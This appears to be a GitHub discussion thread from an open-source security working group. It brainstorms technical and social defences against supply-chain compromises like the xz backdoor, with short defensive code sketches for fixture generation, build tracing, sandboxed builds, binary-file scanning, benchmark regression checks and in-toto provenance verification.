From a technical perspective, are there any options available to projects & maintainers to detect or avoid situations like the recent xz compromise? #143
-
Discourage the use of binary test cases -- instead, the repo should have scripts that generate those test case binaries when they're needed. Opaque binaries are very difficult to reason about. This doesn't cover all cases -- e.g., images, static data files, etc.
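A minimal sketch of this idea, assuming a hypothetical repo layout (`tests/fixtures/`) and a fixture consisting of a deliberately truncated `.xz` stream; both are illustrative, not taken from any particular project:

```python
# Regenerate a binary test fixture from code instead of committing the blob.
# The fixture here is a deliberately truncated .xz file: a valid stream
# starts with the 6-byte magic FD 37 7A 58 5A 00, so writing only the magic
# yields a deterministic "truncated input" test case anyone can audit.
import os

def make_truncated_xz(path: str) -> None:
    with open(path, "wb") as f:
        f.write(b"\xfd7zXZ\x00")  # .xz stream magic, then nothing

if __name__ == "__main__":
    os.makedirs("tests/fixtures", exist_ok=True)
    make_truncated_xz("tests/fixtures/truncated.xz")
    print("regenerated tests/fixtures/truncated.xz")
```

Because the fixture is produced by a few reviewable lines, a reviewer can reason about exactly which bytes end up in the test file.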
-
A heuristic of "high risk change" vs. "low risk change" might be helpful, based on the content of the PR and perhaps the committer's historical contributions -- e.g., "I see you only make typo fixes in JavaScript, but now you've tweaked the memory allocator in this low-level driver code". Relatedly, when a high-risk change in a critical project is identified -- either manually, perhaps by tagging the issue, or through a PR scanner -- that signal could be sent to a paid team of security professionals for review.
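One way such a heuristic could be sketched; the path patterns, weights, and `ChangedFile` shape below are invented for illustration, and a real scanner would pull diffs and contributor history from the forge's API:

```python
# Hypothetical "high risk vs. low risk change" scorer for a PR.
from dataclasses import dataclass

# Paths that plausibly deserve extra scrutiny (illustrative, not exhaustive).
RISKY_PATH_HINTS = ("alloc", "crypto", "auth", "m4/", "configure", "cmake")

@dataclass
class ChangedFile:
    path: str
    lines_changed: int

def risk_score(files: list[ChangedFile], prior_commits_to_area: int) -> float:
    score = 0.0
    for f in files:
        if any(hint in f.path.lower() for hint in RISKY_PATH_HINTS):
            score += 2.0                            # touches sensitive code
        score += min(f.lines_changed / 100.0, 1.0)  # large diffs add a little
    if prior_commits_to_area == 0:
        score *= 2.0  # contributor has never touched this area before
    return score

if __name__ == "__main__":
    pr = [ChangedFile("src/liblzma/check/crc64_fast.c", 40),
          ChangedFile("m4/build-to-host.m4", 20)]
    print(f"risk score: {risk_score(pr, prior_commits_to_area=0):.1f}")
```

High-scoring PRs could then be routed to the proposed team of security professionals without slowing down ordinary contributions.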
-
How about tracing the build/compilation process to see which files/resources get read? Unexpected reads -- e.g., a build step reading files that are supposedly test data, as happened with xz -- would stand out.
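A minimal sketch of this, assuming a Linux host with strace installed; the build command and the "reads under tests/ are suspicious" rule are illustrative assumptions:

```python
# Trace which files a build opens, then flag reads that a build step has no
# obvious business doing (in the xz case, build machinery read "test data").
import re
import subprocess

def trace_build(cmd: list[str], log: str = "build-trace.log") -> set[str]:
    # strace: -f follows child processes, -e trace=openat logs file opens.
    subprocess.run(["strace", "-f", "-e", "trace=openat", "-o", log] + cmd,
                   check=True)
    opened = set()
    with open(log) as f:
        for line in f:
            m = re.search(r'openat\([^"]*"([^"]+)"', line)
            if m:
                opened.add(m.group(1))
    return opened

if __name__ == "__main__":
    for path in sorted(trace_build(["make"])):
        if "/tests/" in path or path.startswith("tests/"):
            print("suspicious read during build:", path)
```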
-
Here are some xz backdoor (CVE-2024-3094) notes. There are MANY sources of info about the backdoor in versions 5.6.0 and 5.6.1 of the xz compression utility and library. It targeted OpenSSH. Andres Freund discovered the backdoor by noticing that failed SSH logins were taking a lot of CPU time while doing some micro-benchmarking, and tracked the problem down from there. It was introduced by xz co-maintainer "Jia Tan".

Here I'll quickly brainstorm some approaches that MIGHT have helped, with some possible pros and cons. I'm not necessarily advocating for them, since some have serious negatives, but maybe they'll spawn good ideas.

**Don't GENERATE tarballs or their contents (e.g., configure)**

The attack hid in a file that was putatively generated by autoconf, but wasn't. Autoconf is from a time when people generated tarballs with extra material in them; back then, you couldn't be sure the recipient would have all the necessary build tools. That's not usually a problem today. Instead, you could distribute source tarballs that are strictly copies of a version from a version control system, and since the latter is what people review, that would make sense. This is a big change from how autoconf was originally intended to be used, but it's not that hard to make. It would mean that to build, you'd need autotools installed, and the first step when building the package would be "autoreconf" (which calls the right tools in the right order). You could then verify that what you received is what was stored in the source repo, which is an easy check once nothing is generated. Bonus points if we could make archives reproducible: currently an archive (tarball, zip, etc.) can have its bits change without a change in its contents.

**Verify or ignore generated files in tarballs**

You could also forcibly regenerate (e.g., with autoreconf) files that were supposedly generated.

**Least privilege during prep, build, and test**

It'd be possible to build systems that greatly reduce privileges during each of these phases -- e.g., running the build and test steps with no network access.
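A minimal sketch of the no-network variant, assuming a Linux host where unprivileged user namespaces are enabled (so util-linux `unshare` works without root); the `make check` command is a placeholder:

```python
# Run a build or test step inside a fresh, empty network namespace so that
# nothing it executes can phone home or fetch unexpected inputs.
import subprocess
import sys

def run_without_network(cmd: list[str]) -> int:
    # unshare -r maps the current user to root *inside* the namespace only;
    # unshare -n creates a new network namespace with no usable interfaces.
    return subprocess.run(["unshare", "-r", "-n"] + cmd).returncode

if __name__ == "__main__":
    sys.exit(run_without_network(["make", "check"]))
```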
**Forbid/warn on embedded binary files**

Scorecard already ranks these as risks. That said, there are many cases where tests legitimately need binary files, so this is harder to pull off broadly. (A small scanner sketch follows at the end of this comment.)

**Least privilege on link**

It's really unusual for one program to need to modify the link-time processing of another. Can we disable that, at least in many cases, and require a separate permission to grant it -- one that an attacker can't manipulate?

**Developers knowing developers**

Nobody knows who the attacker is (likely a team). I don't think people need to give up privacy just to contribute code. However, I think it's important to either (1) have the other co-maintainers know and have met the maintainer, or (2) treat an anonymous maintainer with greater suspicion, or ideally (3) both.

**Multi-person review**

Part of the problem here was that an overworked maintainer was bullied into accepting another maintainer. If every change were reviewed by multiple people before acceptance, and it was KNOWN that they were different people, this attack would not have worked. Sure, you can have multiple malicious parties, but that is harder.

**Other ideas?**

I'm sure there are other ideas. It'd be wise to discuss how to make these kinds of attacks harder to perform.
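Regarding the "forbid/warn on embedded binary files" idea above, here's a minimal scanner sketch; the NUL-byte heuristic is a crude stand-in for whatever a real check (like Scorecard's) would do:

```python
# Walk a repository and flag files that look binary (contain NUL bytes in the
# first few KB). Crude, but enough to surface opaque blobs for review.
import os
import sys

def looks_binary(path: str, probe: int = 8192) -> bool:
    try:
        with open(path, "rb") as f:
            return b"\x00" in f.read(probe)
    except OSError:
        return False  # unreadable file or dangling symlink; skip it

def scan(repo_root: str) -> list[str]:
    hits = []
    for dirpath, dirnames, filenames in os.walk(repo_root):
        dirnames[:] = [d for d in dirnames if d != ".git"]  # skip VCS metadata
        for name in filenames:
            path = os.path.join(dirpath, name)
            if looks_binary(path):
                hits.append(path)
    return hits

if __name__ == "__main__":
    for path in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("binary file:", path)
```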
-
It did get caught due to the second-order effect of a performance regression. I know I'll be looking more closely at our regression test suites around Go and OpenJDK, and asking the author "I see a difference of X here; let's look at the likely root cause of that".
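A minimal sketch of mechanizing that comparison, assuming a hypothetical JSON result format of `{"benchmark_name": seconds}` and an arbitrary 10% threshold:

```python
# Compare two benchmark runs and flag anything meaningfully slower, so a
# reviewer can ask "I see a difference of X here, what's the root cause?"
import json
import sys

THRESHOLD = 0.10  # flag results more than 10% slower than baseline (assumed)

def load(path: str) -> dict[str, float]:
    with open(path) as f:
        return json.load(f)

def regressions(baseline: dict[str, float], current: dict[str, float]):
    for name, base in sorted(baseline.items()):
        new = current.get(name)
        if new is not None and base > 0 and (new - base) / base > THRESHOLD:
            yield name, base, new

if __name__ == "__main__":
    base, cur = load(sys.argv[1]), load(sys.argv[2])
    for name, old, new in regressions(base, cur):
        print(f"{name}: {old:.3f}s -> {new:.3f}s (+{(new - old) / old:.0%})")
```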
-
**Identify the top OSS projects (especially with solo maintainers) and fund added work/review of changes**

It's obviously not possible to seriously fund "all OSS projects", but focusing on the "most important ones" is plausible. That's the premise of the OpenSSF Securing Critical Projects Working Group. In the case of xz, we did have specific warning: a report I wrote in 2015. I was the lead author of the 2015 report "Open Source Software Projects Needing Security Investments", which was funded by the Linux Foundation. The goal was a relatively quick analysis to determine what the "most important OSS" was; we agreed to focus on packages in Linux distributions (specifically Debian). I just double-checked: xz-utils was specifically listed as one of the riskiest, because it is a very widely used compression algorithm. Quick note: it's colloquially often referred to as "Census I", but that title never occurs in the paper; the name was applied after the fact due to the later "Census II" work by Harvard on language-level packages. You can get the 2015 paper here: https://www.ida.org/-/media/feature/publications/o/op/open-source-software-projects-needing-security-investments/d-5459.ashx or https://github.com/coreinfrastructure/census/blob/master/OSS-2015-06-19.pdf (on the latter, click "download").

**Load at run-time only what you need (e.g., dlopen)**

A useful countermeasure is to load software only when you need to use it. Depending on details, this can significantly reduce the number of systems affected by a specific attack. The systemd folks have been exploring this: "A while back we started to turn many of the library dependencies of systemd from regular ELF dependencies (which you can explore with tools like lddtree or readelf -d … | grep NEEDED) into dlopen() deps, in order to minimize the dep footprint of systemd." This potentially reduces the number of systems that are vulnerable: if the software isn't normally loaded and the attacker can't trigger its loading, the system won't be exploitable even though the vulnerability technically exists on disk. In theory this could also reduce memory/disk use, though since most systems today page memory in and out, that effect is less significant than it would have been on old systems. One disadvantage of switching from ELF dependencies to dlopen() dependencies is that it suddenly makes many dependencies nearly invisible to other tools. The systemd folks have a nice solution for this: they propose creating a new ELF section that records this information, so tools can get the dependency data easily. See: systemd/systemd#32234. Bonus points if dlopen() is rigged to only allow opening a file when a corresponding ELF section records it as a dependency; that would mean you have to create an approvelist of libraries that can be dlopen'ed.
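To make the dlopen() idea concrete, here's a minimal Python sketch using ctypes (which wraps dlopen() on Linux); `lzma_version_string()` is a real liblzma function, but the lazy-loading structure is just an illustration of the pattern:

```python
# Load liblzma only when a caller actually needs it, so merely starting the
# program never maps the library into the process.
import ctypes
import ctypes.util

_lzma = None

def _load_liblzma():
    global _lzma
    if _lzma is None:
        name = ctypes.util.find_library("lzma")  # e.g. "liblzma.so.5"
        if name is None:
            raise OSError("liblzma not found")
        _lzma = ctypes.CDLL(name)  # the dlopen() happens here, on first use
    return _lzma

def lzma_version() -> str:
    # lzma_version_string() returns a const char* with the library version.
    lib = _load_liblzma()
    lib.lzma_version_string.restype = ctypes.c_char_p
    return lib.lzma_version_string().decode()

if __name__ == "__main__":
    print("liblzma version (loaded lazily):", lzma_version())
```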
-
Create linked provenance documents with in-toto and check them against a layout. https://github.com/in-toto/witness is a great tool for this. Full disclosure: I am a maintainer, and on the in-toto steering committee.
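A minimal sketch of that flow, driving the in-toto reference implementation's CLI tools from Python; the step name, key files, layout file, and build command are all placeholders, and the flags shown follow the in-toto demo, so treat them as assumptions to check against your installed version:

```python
# Record a signed link for the build step, then verify all collected link
# metadata against a signed layout describing who may perform which steps.
import subprocess

def record_build_step():
    subprocess.run([
        "in-toto-run",
        "--step-name", "build",
        "--key", "builder-key",           # placeholder functionary key
        "--materials", "src/",            # inputs hashed before the step
        "--products", "dist/app.tar.gz",  # outputs hashed after the step
        "--", "make", "release",
    ], check=True)

def verify_supply_chain():
    subprocess.run([
        "in-toto-verify",
        "--layout", "root.layout",         # placeholder signed layout
        "--layout-key", "owner-key.pub",   # placeholder project-owner key
    ], check=True)

if __name__ == "__main__":
    record_build_step()
    verify_supply_chain()
```

witness, the tool named above, provides a similar record-and-verify flow built around attestations; its commands differ from the reference CLI, so see its README for the equivalent steps.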
-
This goes hand-in-hand with an issue the WG is creating to identify, and advocate for, means developers can take to protect themselves from the social engineering and bullying exemplified in this attack pattern (https://boehs.org/node/everything-i-know-about-the-xz-backdoor) -- see Vuln WG issue #142.
What tools, technologies, or processes are available (or could be written) that would help maintainers and people involved in the downstream supply chain identify and prevent this style of attack?